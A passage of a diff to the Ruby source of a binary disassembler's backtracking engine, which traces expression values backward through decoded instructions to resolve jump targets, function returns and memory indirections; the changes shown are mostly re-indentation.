+ # when the address does not match a known instruction/function: + # :unknown_addr :addr + # + # the block return value is used as follow for :di, :func, :up and :loop: + # false => the backtrace stops for the branch + # nil => the backtrace continues with the current object + # anything else => the backtrace continues with this object + # + # method arguments: + # obj is the initial value of the object + # addr is the address where the backtrace starts + # include_start is a bool specifying if the backtrace should start at addr or just before + # from_subfuncret is a bool specifying if addr points to a decodedinstruction that calls a subfunction + # stopaddr is an [array of] address of instruction, the backtrace will stop just after executing it + # maxdepth is the maximum depth (in blocks) for each backtrace branch. + # (defaults to dasm.backtrace_maxblocks, which defaults do Dasm.backtrace_maxblocks) + def backtrace_walk(obj, addr, include_start, from_subfuncret, stopaddr, maxdepth) + start_addr = normalize(addr) + stopaddr = [stopaddr] if stopaddr and not stopaddr.kind_of? ::Array + + # array of [obj, addr, from_subfuncret, loopdetect] + # loopdetect is an array of [obj, addr, from_type] of each end of block encountered + todo = [] + + # array of [obj, blockaddr] + # avoids rewalking the same value + done = [] + + # updates todo with the addresses to backtrace next + walk_up = lambda { |w_obj, w_addr, w_loopdetect| + if w_loopdetect.length > maxdepth + yield :maxdepth, w_obj, :addr => w_addr, :loopdetect => w_loopdetect + elsif stopaddr and stopaddr.include?(w_addr) + yield :stopaddr, w_obj, :addr => w_addr, :loopdetect => w_loopdetect + elsif w_di = @decoded[w_addr] and w_di != w_di.block.list.first and w_di.address != w_di.block.address + prevdi = w_di.block.list[w_di.block.list.index(w_di)-1] + todo << [w_obj, prevdi.address, :normal, w_loopdetect] + elsif w_di + next if done.include? [w_obj, w_addr] + done << [w_obj, w_addr] + hadsomething = false + w_di.block.each_from { |f_addr, f_type| + next if f_type == :indirect + hadsomething = true + o_f_addr = f_addr + f_addr = @decoded[f_addr].block.list.last.address if @decoded[f_addr].kind_of? DecodedInstruction # delay slot + if l = w_loopdetect.find { |l_obj, l_addr, l_type| l_addr == f_addr and l_type == f_type } + f_obj = yield(:loop, w_obj, :looptrace => w_loopdetect[w_loopdetect.index(l)..-1], :loopdetect => w_loopdetect) + if f_obj and f_obj != w_obj # should avoid infinite loops + f_loopdetect = w_loopdetect[0...w_loopdetect.index(l)] + end + else + f_obj = yield(:up, w_obj, :from => w_addr, :to => f_addr, :sfret => f_type, :loopdetect => w_loopdetect, :real_to => o_f_addr) + end + next if f_obj == false + f_obj ||= w_obj + f_loopdetect ||= w_loopdetect + # only count non-trivial paths in loopdetect (ignore linear links) + add_detect = [[f_obj, f_addr, f_type]] + add_detect = [] if @decoded[f_addr].kind_of? DecodedInstruction and tmp = @decoded[f_addr].block and + ((w_di.block.from_subfuncret.to_a == [] and w_di.block.from_normal == [f_addr] and + tmp.to_normal == [w_di.address] and tmp.to_subfuncret.to_a == []) or + (w_di.block.from_subfuncret == [f_addr] and tmp.to_subfuncret == [w_di.address])) + todo << [f_obj, f_addr, f_type, f_loopdetect + add_detect ] + } + yield :end, w_obj, :addr => w_addr, :loopdetect => w_loopdetect if not hadsomething + elsif @function[w_addr] and w_addr != :default and w_addr != Expression::Unknown + next if done.include? [w_obj, w_addr] + oldlen = todo.length + each_xref(w_addr, :x) { |x| + f_addr = x.origin + o_f_addr = f_addr + f_addr = @decoded[f_addr].block.list.last.address if @decoded[f_addr].kind_of? DecodedInstruction # delay slot + if l = w_loopdetect.find { |l_obj, l_addr, l_type| l_addr == w_addr } + f_obj = yield(:loop, w_obj, :looptrace => w_loopdetect[w_loopdetect.index(l)..-1], :loopdetect => w_loopdetect) + if f_obj and f_obj != w_obj + f_loopdetect = w_loopdetect[0...w_loopdetect.index(l)] + end + else + f_obj = yield(:up, w_obj, :from => w_addr, :to => f_addr, :sfret => :normal, :loopdetect => w_loopdetect, :real_to => o_f_addr) + end + next if f_obj == false + f_obj ||= w_obj + f_loopdetect ||= w_loopdetect + todo << [f_obj, f_addr, :normal, f_loopdetect + [[f_obj, f_addr, :normal]] ] + } + yield :end, w_obj, :addr => w_addr, :loopdetect => w_loopdetect if todo.length == oldlen + else + yield :unknown_addr, w_obj, :addr => w_addr, :loopdetect => w_loopdetect + end + } + + if include_start + todo << [obj, start_addr, from_subfuncret ? :subfuncret : :normal, []] + else + walk_up[obj, start_addr, []] + end + + while not todo.empty? + obj, addr, type, loopdetect = todo.pop + di = @decoded[addr] + if di and type == :subfuncret + di.block.each_to_normal { |sf| + next if not f = @function[normalize(sf)] + s_obj = yield(:func, obj, :func => f, :funcaddr => sf, :addr => addr, :loopdetect => loopdetect) + next if s_obj == false + s_obj ||= obj + if l = loopdetect.find { |l_obj, l_addr, l_type| addr == l_addr and l_type == :normal } + l_obj = yield(:loop, s_obj, :looptrace => loopdetect[loopdetect.index(l)..-1], :loopdetect => loopdetect) + if l_obj and l_obj != s_obj + s_loopdetect = loopdetect[0...loopdetect.index(l)] + end + next if l_obj == false + s_obj = l_obj if l_obj + end + s_loopdetect ||= loopdetect + todo << [s_obj, addr, :normal, s_loopdetect + [[s_obj, addr, :normal]] ] + } + elsif di + # XXX should interpolate index if di is not in block.list, but what if the addresses are not Comparable ? + di.block.list[0..(di.block.list.index(di) || -1)].reverse_each { |di_| + di = di_ # XXX not sure.. + if stopaddr and ea = di.next_addr and stopaddr.include?(ea) + yield :stopaddr, obj, :addr => ea, :loopdetect => loopdetect + break + end + ex_obj = obj + obj = yield(:di, obj, :di => di, :loopdetect => loopdetect) + break if obj == false + obj ||= ex_obj + } + walk_up[obj, di.block.address, loopdetect] if obj + elsif @function[addr] and addr != :default and addr != Expression::Unknown + ex_obj = obj + obj = yield(:func, obj, :func => @function[addr], :funcaddr => addr, :addr => addr, :loopdetect => loopdetect) + next if obj == false + obj ||= ex_obj + walk_up[obj, addr, loopdetect] + else + yield :unknown_addr, obj, :addr => addr, :loopdetect => loopdetect + end + end + end + + # holds a backtrace result until a snapshot_addr is encountered + class StoppedExpr + attr_accessor :exprs + def initialize(e) @exprs = e end + end + + + attr_accessor :debug_backtrace + + # backtraces the value of an expression from start_addr + # updates blocks backtracked_for if type is set + # uses backtrace_walk + # all values returned are from backtrace_check_found (which may generate xrefs, labels, addrs to dasm) unless :no_check is specified + # options: + # :include_start => start backtracking including start_addr + # :from_subfuncret => + # :origin => origin to set for xrefs when resolution is successful + # :orig_expr => initial expression + # :type => xref type (:r, :w, :x, :addr) when :x, the results are added to #addrs_todo + # :len => xref len (for :r/:w) + # :snapshot_addr => addr (or array of) where the backtracker should stop + # if a snapshot_addr is given, values found are ignored if continuing the backtrace does not get to it (eg maxdepth/unk_addr/end) + # :maxdepth => maximum number of blocks to backtrace + # :detached => true if backtracking type :x and the result should not have from = origin set in @addrs_todo + # :max_complexity{_data} => maximum complexity of the expression before aborting its backtrace + # :log => Array, will be updated with the backtrace evolution + # :only_upto => backtrace only to update bt_for for current block & previous ending at only_upto + # :no_check => don't use backtrace_check_found (will not backtrace indirection static values) + # :terminals => array of symbols with constant value (stop backtracking if all symbols in the expr are terminals) (only supported with no_check) + def backtrace(expr, start_addr, nargs={}) + include_start = nargs.delete :include_start + from_subfuncret = nargs.delete :from_subfuncret + origin = nargs.delete :origin + origexpr = nargs.delete :orig_expr + type = nargs.delete :type + len = nargs.delete :len + snapshot_addr = nargs.delete(:snapshot_addr) || nargs.delete(:stopaddr) + maxdepth = nargs.delete(:maxdepth) || @backtrace_maxblocks + detached = nargs.delete :detached + max_complexity = nargs.delete(:max_complexity) || @backtrace_maxcomplexity + max_complexity_data = nargs.delete(:max_complexity) || @backtrace_maxcomplexity_data + bt_log = nargs.delete :log # array to receive the ongoing backtrace info + only_upto = nargs.delete :only_upto + no_check = nargs.delete :no_check + terminals = nargs.delete(:terminals) || [] + raise ArgumentError, "invalid argument to backtrace #{nargs.keys.inspect}" if not nargs.empty? + + expr = Expression[expr] + + origexpr = expr if origin == start_addr + + start_addr = normalize(start_addr) + di = @decoded[start_addr] + + if not snapshot_addr and @cpu.backtrace_is_stack_address(expr) puts " not backtracking stack address #{expr}" if debug_backtrace - return [] - end - - if type == :r or type == :w - max_complexity = max_complexity_data - maxdepth = @backtrace_maxblocks_data if backtrace_maxblocks_data and maxdepth > @backtrace_maxblocks_data - end - - if vals = (no_check ? (!need_backtrace(expr, terminals) and [expr]) : backtrace_check_found(expr, - di, origin, type, len, maxdepth, detached)) - # no need to update backtracked_for - return vals - elsif maxdepth <= 0 - return [Expression::Unknown] - end - - # create initial backtracked_for - if type and origin == start_addr and di - btt = BacktraceTrace.new(expr, origin, origexpr, type, len, maxdepth-1) - btt.address = di.address - btt.exclude_instr = true if not include_start - btt.from_subfuncret = true if from_subfuncret and include_start - btt.detached = true if detached - di.block.backtracked_for |= [btt] - end - - @callback_prebacktrace[] if callback_prebacktrace - - # list of Expression/Integer - result = [] + return [] + end + + if type == :r or type == :w + max_complexity = max_complexity_data + maxdepth = @backtrace_maxblocks_data if backtrace_maxblocks_data and maxdepth > @backtrace_maxblocks_data + end + + if vals = (no_check ? (!need_backtrace(expr, terminals) and [expr]) : backtrace_check_found(expr, + di, origin, type, len, maxdepth, detached)) + # no need to update backtracked_for + return vals + elsif maxdepth <= 0 + return [Expression::Unknown] + end + + # create initial backtracked_for + if type and origin == start_addr and di + btt = BacktraceTrace.new(expr, origin, origexpr, type, len, maxdepth-1) + btt.address = di.address + btt.exclude_instr = true if not include_start + btt.from_subfuncret = true if from_subfuncret and include_start + btt.detached = true if detached + di.block.backtracked_for |= [btt] + end + + @callback_prebacktrace[] if callback_prebacktrace + + # list of Expression/Integer + result = [] puts "backtracking #{type} #{expr} from #{di || Expression[start_addr || 0]} for #{@decoded[origin]}" if debug_backtrace or $DEBUG - bt_log << [:start, expr, start_addr] if bt_log - backtrace_walk(expr, start_addr, include_start, from_subfuncret, snapshot_addr, maxdepth) { |ev, expr_, h| - expr = expr_ - case ev - when :unknown_addr, :maxdepth + bt_log << [:start, expr, start_addr] if bt_log + backtrace_walk(expr, start_addr, include_start, from_subfuncret, snapshot_addr, maxdepth) { |ev, expr_, h| + expr = expr_ + case ev + when :unknown_addr, :maxdepth puts " backtrace end #{ev} #{expr}" if debug_backtrace - result |= [expr] if not snapshot_addr - @addrs_todo << [expr, (detached ? nil : origin)] if not snapshot_addr and type == :x and origin - when :end - if not expr.kind_of? StoppedExpr - oldexpr = expr - expr = backtrace_emu_blockup(h[:addr], expr) + result |= [expr] if not snapshot_addr + @addrs_todo << [expr, (detached ? nil : origin)] if not snapshot_addr and type == :x and origin + when :end + if not expr.kind_of? StoppedExpr + oldexpr = expr + expr = backtrace_emu_blockup(h[:addr], expr) puts " backtrace up #{Expression[h[:addr]]} #{oldexpr}#{" => #{expr}" if expr != oldexpr}" if debug_backtrace - bt_log << [:up, expr, oldexpr, h[:addr], :end] if bt_log and expr != oldexpr - if expr != oldexpr and not snapshot_addr and vals = (no_check ? - (!need_backtrace(expr, terminals) and [expr]) : - backtrace_check_found(expr, nil, origin, type, len, - maxdepth-h[:loopdetect].length, detached)) - result |= vals - next - end - end + bt_log << [:up, expr, oldexpr, h[:addr], :end] if bt_log and expr != oldexpr + if expr != oldexpr and not snapshot_addr and vals = (no_check ? + (!need_backtrace(expr, terminals) and [expr]) : + backtrace_check_found(expr, nil, origin, type, len, + maxdepth-h[:loopdetect].length, detached)) + result |= vals + next + end + end puts " backtrace end #{ev} #{expr}" if debug_backtrace - if not snapshot_addr - result |= [expr] - - btt = BacktraceTrace.new(expr, origin, origexpr, type, len, maxdepth-h[:loopdetect].length-1) - btt.detached = true if detached - @decoded[h[:addr]].block.backtracked_for |= [btt] if @decoded[h[:addr]] - @function[h[:addr]].backtracked_for |= [btt] if @function[h[:addr]] and h[:addr] != :default - @addrs_todo << [expr, (detached ? nil : origin)] if type == :x and origin - end - when :stopaddr - if not expr.kind_of? StoppedExpr - oldexpr = expr - expr = backtrace_emu_blockup(h[:addr], expr) + if not snapshot_addr + result |= [expr] + + btt = BacktraceTrace.new(expr, origin, origexpr, type, len, maxdepth-h[:loopdetect].length-1) + btt.detached = true if detached + @decoded[h[:addr]].block.backtracked_for |= [btt] if @decoded[h[:addr]] + @function[h[:addr]].backtracked_for |= [btt] if @function[h[:addr]] and h[:addr] != :default + @addrs_todo << [expr, (detached ? nil : origin)] if type == :x and origin + end + when :stopaddr + if not expr.kind_of? StoppedExpr + oldexpr = expr + expr = backtrace_emu_blockup(h[:addr], expr) puts " backtrace up #{Expression[h[:addr]]} #{oldexpr}#{" => #{expr}" if expr != oldexpr}" if debug_backtrace - bt_log << [:up, expr, oldexpr, h[:addr], :end] if bt_log and expr != oldexpr - end + bt_log << [:up, expr, oldexpr, h[:addr], :end] if bt_log and expr != oldexpr + end puts " backtrace end #{ev} #{expr}" if debug_backtrace - result |= ((expr.kind_of?(StoppedExpr)) ? expr.exprs : [expr]) - when :loop - next false if expr.kind_of? StoppedExpr - t = h[:looptrace] - oldexpr = t[0][0] - next false if expr == oldexpr # unmodifying loop + result |= ((expr.kind_of?(StoppedExpr)) ? expr.exprs : [expr]) + when :loop + next false if expr.kind_of? StoppedExpr + t = h[:looptrace] + oldexpr = t[0][0] + next false if expr == oldexpr # unmodifying loop puts " bt loop at #{Expression[t[0][1]]}: #{oldexpr} => #{expr} (#{t.map { |z| Expression[z[1]] }.join(' <- ')})" if debug_backtrace - false - when :up - next false if only_upto and h[:to] != only_upto - next expr if expr.kind_of? StoppedExpr - oldexpr = expr - expr = backtrace_emu_blockup(h[:from], expr) + false + when :up + next false if only_upto and h[:to] != only_upto + next expr if expr.kind_of? StoppedExpr + oldexpr = expr + expr = backtrace_emu_blockup(h[:from], expr) puts " backtrace up #{Expression[h[:from]]}->#{Expression[h[:to]]} #{oldexpr}#{" => #{expr}" if expr != oldexpr}" if debug_backtrace - bt_log << [:up, expr, oldexpr, h[:from], h[:to]] if bt_log - - if expr != oldexpr and vals = (no_check ? (!need_backtrace(expr, terminals) and [expr]) : - backtrace_check_found(expr, @decoded[h[:from]], origin, type, len, - maxdepth-h[:loopdetect].length, detached)) - if snapshot_addr - expr = StoppedExpr.new vals - next expr - else - result |= vals - bt_log << [:found, vals, h[:from]] if bt_log - next false - end - end - - if origin and type - # update backtracked_for - update_btf = lambda { |btf, new_btt| - # returns true if btf was modified - if i = btf.index(new_btt) - btf[i] = new_btt if btf[i].maxdepth < new_btt.maxdepth - else - btf << new_btt - end - } - - btt = BacktraceTrace.new(expr, origin, origexpr, type, len, maxdepth-h[:loopdetect].length-1) - btt.detached = true if detached - if x = di_at(h[:from]) - update_btf[x.block.backtracked_for, btt] - end - if x = @function[h[:from]] and h[:from] != :default - update_btf[x.backtracked_for, btt] - end - if x = di_at(h[:to]) - btt = btt.dup - btt.address = x.address - btt.from_subfuncret = true if h[:sfret] == :subfuncret - if backtrace_check_funcret(btt, h[:from], h[:real_to] || h[:to]) + bt_log << [:up, expr, oldexpr, h[:from], h[:to]] if bt_log + + if expr != oldexpr and vals = (no_check ? (!need_backtrace(expr, terminals) and [expr]) : + backtrace_check_found(expr, @decoded[h[:from]], origin, type, len, + maxdepth-h[:loopdetect].length, detached)) + if snapshot_addr + expr = StoppedExpr.new vals + next expr + else + result |= vals + bt_log << [:found, vals, h[:from]] if bt_log + next false + end + end + + if origin and type + # update backtracked_for + update_btf = lambda { |btf, new_btt| + # returns true if btf was modified + if i = btf.index(new_btt) + btf[i] = new_btt if btf[i].maxdepth < new_btt.maxdepth + else + btf << new_btt + end + } + + btt = BacktraceTrace.new(expr, origin, origexpr, type, len, maxdepth-h[:loopdetect].length-1) + btt.detached = true if detached + if x = di_at(h[:from]) + update_btf[x.block.backtracked_for, btt] + end + if x = @function[h[:from]] and h[:from] != :default + update_btf[x.backtracked_for, btt] + end + if x = di_at(h[:to]) + btt = btt.dup + btt.address = x.address + btt.from_subfuncret = true if h[:sfret] == :subfuncret + if backtrace_check_funcret(btt, h[:from], h[:real_to] || h[:to]) puts " function returns to caller" if debug_backtrace - next false - end - if not update_btf[x.block.backtracked_for, btt] + next false + end + if not update_btf[x.block.backtracked_for, btt] puts " already backtraced" if debug_backtrace - next false - end - end - end - expr - when :di, :func - next if expr.kind_of? StoppedExpr - if not snapshot_addr and @cpu.backtrace_is_stack_address(expr) + next false + end + end + end + expr + when :di, :func + next if expr.kind_of? StoppedExpr + if not snapshot_addr and @cpu.backtrace_is_stack_address(expr) puts " not backtracking stack address #{expr}" if debug_backtrace - next false - end + next false + end oldexpr = expr - case ev - when :di - h[:addr] = h[:di].address - expr = backtrace_emu_instr(h[:di], expr) - bt_log << [ev, expr, oldexpr, h[:di], h[:addr]] if bt_log and expr != oldexpr - when :func - expr = backtrace_emu_subfunc(h[:func], h[:funcaddr], h[:addr], expr, origin, maxdepth-h[:loopdetect].length) - if snapshot_addr and snapshot_addr == h[:funcaddr] - # XXX recursiveness detection needs to be fixed + case ev + when :di + h[:addr] = h[:di].address + expr = backtrace_emu_instr(h[:di], expr) + bt_log << [ev, expr, oldexpr, h[:di], h[:addr]] if bt_log and expr != oldexpr + when :func + expr = backtrace_emu_subfunc(h[:func], h[:funcaddr], h[:addr], expr, origin, maxdepth-h[:loopdetect].length) + if snapshot_addr and snapshot_addr == h[:funcaddr] + # XXX recursiveness detection needs to be fixed puts " backtrace: recursive function #{Expression[h[:funcaddr]]}" if debug_backtrace - next false - end - bt_log << [ev, expr, oldexpr, h[:funcaddr], h[:addr]] if bt_log and expr != oldexpr - end + next false + end + bt_log << [ev, expr, oldexpr, h[:funcaddr], h[:addr]] if bt_log and expr != oldexpr + end puts " backtrace #{h[:di] || Expression[h[:funcaddr]]} #{oldexpr} => #{expr}" if debug_backtrace and expr != oldexpr - if vals = (no_check ? (!need_backtrace(expr, terminals) and [expr]) : backtrace_check_found(expr, - h[:di], origin, type, len, maxdepth-h[:loopdetect].length, detached)) - if snapshot_addr - expr = StoppedExpr.new vals - else - result |= vals - bt_log << [:found, vals, h[:addr]] if bt_log - next false - end - elsif expr.complexity > max_complexity + if vals = (no_check ? (!need_backtrace(expr, terminals) and [expr]) : backtrace_check_found(expr, + h[:di], origin, type, len, maxdepth-h[:loopdetect].length, detached)) + if snapshot_addr + expr = StoppedExpr.new vals + else + result |= vals + bt_log << [:found, vals, h[:addr]] if bt_log + next false + end + elsif expr.complexity > max_complexity puts " backtrace aborting, expr too complex" if debug_backtrace - next false - end - expr - else raise ev.inspect - end - } + next false + end + expr + else raise ev.inspect + end + } puts ' backtrace result: ' + result.map { |r| Expression[r] }.join(', ') if debug_backtrace - result - end - - # checks if the BacktraceTrace is a call to a known subfunction - # returns true and updates self.addrs_todo - def backtrace_check_funcret(btt, funcaddr, instraddr) - if di = @decoded[instraddr] and @function[funcaddr] and btt.type == :x and - not btt.from_subfuncret and - @cpu.backtrace_is_function_return(btt.expr, @decoded[btt.origin]) and - retaddr = backtrace_emu_instr(di, btt.expr) and - not need_backtrace(retaddr) + result + end + + # checks if the BacktraceTrace is a call to a known subfunction + # returns true and updates self.addrs_todo + def backtrace_check_funcret(btt, funcaddr, instraddr) + if di = @decoded[instraddr] and @function[funcaddr] and btt.type == :x and + not btt.from_subfuncret and + @cpu.backtrace_is_function_return(btt.expr, @decoded[btt.origin]) and + retaddr = backtrace_emu_instr(di, btt.expr) and + not need_backtrace(retaddr) puts " backtrace addrs_todo << #{Expression[retaddr]} from #{di} (funcret)" if debug_backtrace - di.block.add_to_subfuncret normalize(retaddr) - if @decoded[funcaddr].kind_of? DecodedInstruction - # check that all callers :saveip returns (eg recursive call that was resolved - # before we found funcaddr was a function) - @decoded[funcaddr].block.each_from_normal { |fm| - if fdi = di_at(fm) and fdi.opcode.props[:saveip] and not fdi.block.to_subfuncret - backtrace_check_funcret(btt, funcaddr, fm) - end - } - end - if not @function[funcaddr].finalized - # the function is not fully disassembled: arrange for the retaddr to be - # disassembled only after the subfunction is finished - # for that we walk the code from the call, mark each block start, and insert the sfret - # just before the 1st function block address in @addrs_todo (which is pop()ed by dasm_step) - faddrlist = [] - todo = [] - di.block.each_to_normal { |t| todo << normalize(t) } - while a = todo.pop - next if faddrlist.include? a or not get_section_at(a) - faddrlist << a - if @decoded[a].kind_of? DecodedInstruction - @decoded[a].block.each_to_samefunc(self) { |t| todo << normalize(t) } - end - end - - idx = @addrs_todo.index(@addrs_todo.find { |r, i, sfr| faddrlist.include? normalize(r) }) || -1 - @addrs_todo.insert(idx, [retaddr, instraddr, true]) - else - @addrs_todo << [retaddr, instraddr, true] - end - true - end - end - - # applies one decodedinstruction to an expression - def backtrace_emu_instr(di, expr) - @cpu.backtrace_emu(di, expr) - end - - # applies one subfunction to an expression - def backtrace_emu_subfunc(func, funcaddr, calladdr, expr, origin, maxdepth) - bind = func.get_backtrace_binding(self, funcaddr, calladdr, expr, origin, maxdepth) - Expression[expr.bind(bind).reduce] - end - - # applies a location binding - def backtrace_emu_blockup(addr, expr) - (ab = @address_binding[addr]) ? Expression[expr.bind(ab).reduce] : expr - end - - # static resolution of indirections - def resolve(expr) - binding = Expression[expr].expr_indirections.inject(@old_prog_binding) { |binding_, ind| - e, b = get_section_at(resolve(ind.target)) - return expr if not e - binding_.merge ind => Expression[ e.decode_imm("u#{8*ind.len}".to_sym, @cpu.endianness) ] - } - Expression[expr].bind(binding).reduce - end - - # returns true if the expression needs more backtrace - # it checks for the presence of a symbol (not :unknown), which means it depends on some register value - def need_backtrace(expr, terminals=[]) - return if expr.kind_of? ::Integer - !(expr.externals.grep(::Symbol) - [:unknown] - terminals).empty? - end - - # returns an array of expressions, or nil if expr needs more backtrace - # it needs more backtrace if expr.externals include a Symbol != :unknown (symbol == register value) - # if it need no more backtrace, expr's indirections are recursively resolved - # xrefs are created, and di args are updated (immediate => label) - # if type is :x, addrs_todo is updated, and if di starts a block, expr is checked to see if it may be a subfunction return value - # - # expr indirection are solved by first finding the value of the pointer, and then rebacktracking for write-type access - # detached is true if type is :x and from should not be set in addrs_todo (indirect call flow, eg external function callback) - # if the backtrace ends pre entrypoint, returns the value encoded in the raw binary - # XXX global variable (modified by another function), exported data, multithreaded app.. - # TODO handle memory aliasing (mov ebx, eax ; write [ebx] ; read [eax]) - # TODO trace expr evolution through backtrace, to modify immediates to an expr involving label names - # TODO mov [ptr], imm ; <...> ; jmp [ptr] => rename imm as loc_XX - # eg. mov eax, 42 ; add eax, 4 ; jmp eax => mov eax, some_label-4 - def backtrace_check_found(expr, di, origin, type, len, maxdepth, detached) - # only entrypoints or block starts called by a :saveip are checked for being a function - # want to execute [esp] from a block start - if type == :x and di and di == di.block.list.first and @cpu.backtrace_is_function_return(expr, @decoded[origin]) and ( - # which is an entrypoint.. - (not di.block.from_normal and not di.block.from_subfuncret) or - # ..or called from a saveip - (bool = false ; di.block.each_from_normal { |fn| bool = true if @decoded[fn] and @decoded[fn].opcode.props[:saveip] } ; bool)) - - # now we can mark the current address a function start - # the actual return address will be found later (we tell the caller to continue the backtrace) - addr = di.address - l = auto_label_at(addr, 'sub', 'loc', 'xref') - if not f = @function[addr] - f = @function[addr] = DecodedFunction.new - puts "found new function #{l} at #{Expression[addr]}" if $VERBOSE - end - f.finalized = false - - if @decoded[origin] - f.return_address ||= [] - f.return_address |= [origin] - @decoded[origin].add_comment "endsub #{l}" - # TODO add_xref (to update the comment on rename_label) - end - - f.backtracked_for |= @decoded[addr].block.backtracked_for.find_all { |btt| not btt.address } - end - - return if need_backtrace(expr) + di.block.add_to_subfuncret normalize(retaddr) + if @decoded[funcaddr].kind_of? DecodedInstruction + # check that all callers :saveip returns (eg recursive call that was resolved + # before we found funcaddr was a function) + @decoded[funcaddr].block.each_from_normal { |fm| + if fdi = di_at(fm) and fdi.opcode.props[:saveip] and not fdi.block.to_subfuncret + backtrace_check_funcret(btt, funcaddr, fm) + end + } + end + if not @function[funcaddr].finalized + # the function is not fully disassembled: arrange for the retaddr to be + # disassembled only after the subfunction is finished + # for that we walk the code from the call, mark each block start, and insert the sfret + # just before the 1st function block address in @addrs_todo (which is pop()ed by dasm_step) + faddrlist = [] + todo = [] + di.block.each_to_normal { |t| todo << normalize(t) } + while a = todo.pop + next if faddrlist.include? a or not get_section_at(a) + faddrlist << a + if @decoded[a].kind_of? DecodedInstruction + @decoded[a].block.each_to_samefunc(self) { |t| todo << normalize(t) } + end + end + + idx = @addrs_todo.index(@addrs_todo.find { |r, i, sfr| faddrlist.include? normalize(r) }) || -1 + @addrs_todo.insert(idx, [retaddr, instraddr, true]) + else + @addrs_todo << [retaddr, instraddr, true] + end + true + end + end + + # applies one decodedinstruction to an expression + def backtrace_emu_instr(di, expr) + @cpu.backtrace_emu(di, expr) + end + + # applies one subfunction to an expression + def backtrace_emu_subfunc(func, funcaddr, calladdr, expr, origin, maxdepth) + bind = func.get_backtrace_binding(self, funcaddr, calladdr, expr, origin, maxdepth) + Expression[expr.bind(bind).reduce] + end + + # applies a location binding + def backtrace_emu_blockup(addr, expr) + (ab = @address_binding[addr]) ? Expression[expr.bind(ab).reduce] : expr + end + + # static resolution of indirections + def resolve(expr) + binding = Expression[expr].expr_indirections.inject(@old_prog_binding) { |binding_, ind| + e, b = get_section_at(resolve(ind.target)) + return expr if not e + binding_.merge ind => Expression[ e.decode_imm("u#{8*ind.len}".to_sym, @cpu.endianness) ] + } + Expression[expr].bind(binding).reduce + end + + # returns true if the expression needs more backtrace + # it checks for the presence of a symbol (not :unknown), which means it depends on some register value + def need_backtrace(expr, terminals=[]) + return if expr.kind_of? ::Integer + !(expr.externals.grep(::Symbol) - [:unknown] - terminals).empty? + end + + # returns an array of expressions, or nil if expr needs more backtrace + # it needs more backtrace if expr.externals include a Symbol != :unknown (symbol == register value) + # if it need no more backtrace, expr's indirections are recursively resolved + # xrefs are created, and di args are updated (immediate => label) + # if type is :x, addrs_todo is updated, and if di starts a block, expr is checked to see if it may be a subfunction return value + # + # expr indirection are solved by first finding the value of the pointer, and then rebacktracking for write-type access + # detached is true if type is :x and from should not be set in addrs_todo (indirect call flow, eg external function callback) + # if the backtrace ends pre entrypoint, returns the value encoded in the raw binary + # XXX global variable (modified by another function), exported data, multithreaded app.. + # TODO handle memory aliasing (mov ebx, eax ; write [ebx] ; read [eax]) + # TODO trace expr evolution through backtrace, to modify immediates to an expr involving label names + # TODO mov [ptr], imm ; <...> ; jmp [ptr] => rename imm as loc_XX + # eg. mov eax, 42 ; add eax, 4 ; jmp eax => mov eax, some_label-4 + def backtrace_check_found(expr, di, origin, type, len, maxdepth, detached) + # only entrypoints or block starts called by a :saveip are checked for being a function + # want to execute [esp] from a block start + if type == :x and di and di == di.block.list.first and @cpu.backtrace_is_function_return(expr, @decoded[origin]) and ( + # which is an entrypoint.. + (not di.block.from_normal and not di.block.from_subfuncret) or + # ..or called from a saveip + (bool = false ; di.block.each_from_normal { |fn| bool = true if @decoded[fn] and @decoded[fn].opcode.props[:saveip] } ; bool)) + + # now we can mark the current address a function start + # the actual return address will be found later (we tell the caller to continue the backtrace) + addr = di.address + l = auto_label_at(addr, 'sub', 'loc', 'xref') + if not f = @function[addr] + f = @function[addr] = DecodedFunction.new + puts "found new function #{l} at #{Expression[addr]}" if $VERBOSE + end + f.finalized = false + + if @decoded[origin] + f.return_address ||= [] + f.return_address |= [origin] + @decoded[origin].add_comment "endsub #{l}" + # TODO add_xref (to update the comment on rename_label) + end + + f.backtracked_for |= @decoded[addr].block.backtracked_for.find_all { |btt| not btt.address } + end + + return if need_backtrace(expr) puts "backtrace #{type} found #{expr} from #{di} orig #{@decoded[origin] || Expression[origin] if origin}" if debug_backtrace - result = backtrace_value(expr, maxdepth) - # keep the ori pointer in the results to emulate volatile memory (eg decompiler prefers this) - result << expr if not type - result.uniq! - - # create xrefs/labels - result.each { |e| - backtrace_found_result(e, di, type, origin, len, detached) - } if type and origin - - result - end - - # returns an array of expressions with Indirections resolved (recursive with backtrace_indirection) - def backtrace_value(expr, maxdepth) - # array of expression with all indirections resolved - result = [Expression[expr.reduce]] - - # solve each indirection sequentially, clone expr for each value (aka cross-product) - result.first.expr_indirections.uniq.each { |i| - next_result = [] - backtrace_indirection(i, maxdepth).each { |rr| - next_result |= result.map { |e| Expression[e.bind(i => rr).reduce] } - } - result = next_result - } - - result.uniq - end - - # returns the array of values pointed by the indirection at its invocation (ind.origin) - # first resolves the pointer using backtrace_value, if it does not point in edata keep the original pointer - # then backtraces from ind.origin until it finds an :w xref origin - # if no :w access is found, returns the value encoded in the raw section data - # TODO handle unaligned (partial?) writes - def backtrace_indirection(ind, maxdepth) - if not ind.origin - puts "backtrace_ind: no origin for #{ind}" if $VERBOSE - return [ind] - end - - ret = [] - - decode_imm = lambda { |addr, len| - edata, foo = get_section_at(addr) - if edata - Expression[ edata.decode_imm("u#{8*len}".to_sym, @cpu.endianness) ] - else - Expression::Unknown - end - } - - # resolve pointers (they may include Indirections) - backtrace_value(ind.target, maxdepth).each { |ptr| - # find write xrefs to the ptr - refs = [] - each_xref(ptr, :w) { |x| - # XXX should be rebacktracked on new xref - next if not @decoded[x.origin] - refs |= [x.origin] - } if ptr != Expression::Unknown - - if refs.empty? - if get_section_at(ptr) - # static data, newer written : return encoded value - ret |= [decode_imm[ptr, ind.len]] - next - else - # unknown pointer : backtrace the indirection, hope it solves itself - initval = ind - end - else - # wait until we find a write xref, then backtrace the written value - initval = true - end - - # wait until we arrive at an xref'ing instruction, then backtrace the written value - backtrace_walk(initval, ind.origin, true, false, nil, maxdepth-1) { |ev, expr, h| - case ev - when :unknown_addr, :maxdepth, :stopaddr + result = backtrace_value(expr, maxdepth) + # keep the ori pointer in the results to emulate volatile memory (eg decompiler prefers this) + result << expr if not type + result.uniq! + + # create xrefs/labels + result.each { |e| + backtrace_found_result(e, di, type, origin, len, detached) + } if type and origin + + result + end + + # returns an array of expressions with Indirections resolved (recursive with backtrace_indirection) + def backtrace_value(expr, maxdepth) + # array of expression with all indirections resolved + result = 